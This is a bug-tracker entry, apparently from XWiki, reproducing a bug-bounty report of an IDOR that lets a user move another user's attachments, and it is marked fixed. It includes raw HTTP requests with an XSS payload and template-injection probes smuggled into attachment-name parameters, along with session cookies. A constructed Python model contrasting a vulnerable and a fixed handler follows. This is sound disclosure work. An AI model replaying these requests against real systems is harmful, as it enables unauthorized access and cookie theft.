Details
- Bug
- Resolution: Fixed
- Blocker
- 14.0-rc-1
- Unit
- Unknown
- N/A
- N/A
Description
SUBMISSION REFERENCES
- Submission code: XWIKI-WT6D3WYY
- Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-WT6D3WYY
RESEARCHER INFORMATION
- Submitter: bruhbey
SUBMISSION INFORMATION
- Created at: Thu, 03 Nov 2022 07:44:56 GMT
- Submission status: Archived
REPORT CONTENT
- Severity: High (8.1)
- Domain: https://intigriti.xwiki.com/ (Url)
- Proof of concept: Hey
Summary:
- IDOR on move documents
Steps:
- create 2 accounts
- log in to your first account, go to your profile and upload an attachment
- then go to your second account and upload an attachment
- try to move your attachment (from second account)
First request:
GET /xwiki/bin/view/XWiki/bruhboyi?xpage=attachment%2Fmove&attachment=xwiki%3AXWiki.bruhboyi%40%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg%20src%3DA%20onerror%3Dalert%28document.cookie%29%3E.pdf HTTP/1.1
Host: intigriti.xwiki.com
Connection: close
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=F1F2C6CBB4D4E0FAB1C64749BB732229; username="9c0MhyM7A8TTVVq3M3evqg_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="71a1f21d8049f98419c88f6fc42fd5b5"
- you have to change attachment parameter
Second request:
POST /xwiki/bin/view/XWiki/bruhboyi?xpage=attachment/move&step=2 HTTP/1.1
Host: intigriti.xwiki.com
Connection: close
Content-Length: 444
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://intigriti.xwiki.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyi?xpage=attachment%2Fmove&attachment=xwiki%3AXWiki.bruhboyi%40%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg%20src%3DA%20onerror%3Dalert%28document.cookie%29%3E.pdf
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=F1F2C6CBB4D4E0FAB1C64749BB732229; username="9c0MhyM7A8TTVVq3M3evqg_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="71a1f21d8049f98419c88f6fc42fd5b5"
form_token=wkm7S5aStrzL0zJFDbt1YA&async=true&sourceLocation=xwiki%3AXWiki.bruhboyi&sourceAttachmentName=%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg+src%3DA+onerror%3Dalert%28document.cookie%29%3E.pdf&updateReferences=true&updateReferences=false&autoRedirect=false&targetAttachmentName=%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg+src%3DA+onerror%3Dalert%28document.cookie%29%3E.pdf&targetLocation=XWiki.bruhboyi
- you can simply change sourceLocation and sourceAttachmentName to reproduce issue
I added a PoC video.
Thanks
- Impact: IDOR
- Personal data involved: No
- Endpoint: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/<username>?xpage=attachment/move&step=2
- Type: Insecure Direct Object Reference
- Attachments: No attachments available
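The report boils down to an authorization check performed on the wrong object: the move handler is reached through the caller's own profile page, while the attachment actually moved is the one named by sourceLocation and sourceAttachmentName. The constructed model below (added here; not XWiki's code, and the rights model is an assumption, not XWiki's authorization API) shows a handler with that gap next to one that checks the caller's rights on every document the request references, replaying the two-account scenario from the steps above:

```python
from dataclasses import dataclass, field

@dataclass
class Wiki:
    """Constructed, minimal stand-in for a wiki: attachments per document and
    per-user rights per document (assumption, not XWiki's real authorization API)."""
    attachments: dict = field(default_factory=dict)  # doc ref -> set of attachment names
    rights: dict = field(default_factory=dict)       # (user, doc ref) -> set of rights

    def has_right(self, user, doc, right):
        return right in self.rights.get((user, doc), set())

def move_attachment_vulnerable(wiki, user, source_doc, name, target_doc):
    """Mirrors the reported flaw: only the page the request was sent to
    (targetLocation) is checked, so sourceLocation may name another user's page."""
    if not wiki.has_right(user, target_doc, "edit"):
        raise PermissionError(f"no edit right on {target_doc}")
    wiki.attachments[source_doc].remove(name)
    wiki.attachments.setdefault(target_doc, set()).add(name)

def move_attachment_fixed(wiki, user, source_doc, name, target_doc):
    """Authorize against every object the request references: the caller needs
    edit right on the source document as well as on the target document."""
    for doc in (source_doc, target_doc):
        if not wiki.has_right(user, doc, "edit"):
            raise PermissionError(f"no edit right on {doc}")
    if name not in wiki.attachments.get(source_doc, set()):
        raise LookupError(f"{name} not found on {source_doc}")
    wiki.attachments[source_doc].remove(name)
    wiki.attachments.setdefault(target_doc, set()).add(name)

def cross_user_move_succeeds(move):
    """Replay the report's scenario with constructed users: bob submits a move whose
    sourceLocation is alice's page. True if alice's file ends up on bob's page."""
    wiki = Wiki(
        attachments={"XWiki.alice": {"report.pdf"}, "XWiki.bob": set()},
        rights={("alice", "XWiki.alice"): {"edit"}, ("bob", "XWiki.bob"): {"edit"}},
    )
    try:
        move(wiki, "bob", "XWiki.alice", "report.pdf", "XWiki.bob")
    except PermissionError:
        return False
    return "report.pdf" in wiki.attachments["XWiki.bob"]

if __name__ == "__main__":
    print("vulnerable handler moved another user's file:",
          cross_user_move_succeeds(move_attachment_vulnerable))
    print("fixed handler moved another user's file:",
          cross_user_move_succeeds(move_attachment_fixed))
```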